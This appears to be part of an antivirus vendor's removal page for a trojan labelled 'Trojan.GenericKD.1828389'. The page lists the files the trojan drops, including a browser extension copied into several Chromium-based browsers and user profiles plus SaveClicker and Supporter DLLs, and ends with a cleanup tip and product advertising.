%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\eKK1Ekpn.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\bootstrap.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)
%Program Files%\Supporter\Supporter.dll (272917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHIRSTUV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0RRGIZX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BYIBPPYK\desktop.ini (67 bytes)
%Program Files%\Supporter\SupporterSvc.dll (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZFJLCPJB\desktop.ini (67 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.dat (260 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.dat (260 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\All Users\Application Data\f362fc35c4a3dbfb\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}.20141109042007 (186 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%System%\GroupPolicy\Machine\Registry.pol (264 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe (26944 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.tlb (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.x64.dll (30600 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%System%\GroupPolicy\gpt.ini (315 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.dll (26032 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.GenericKD.1828389_065339e838

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.GenericKD.1828389_065339e838

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet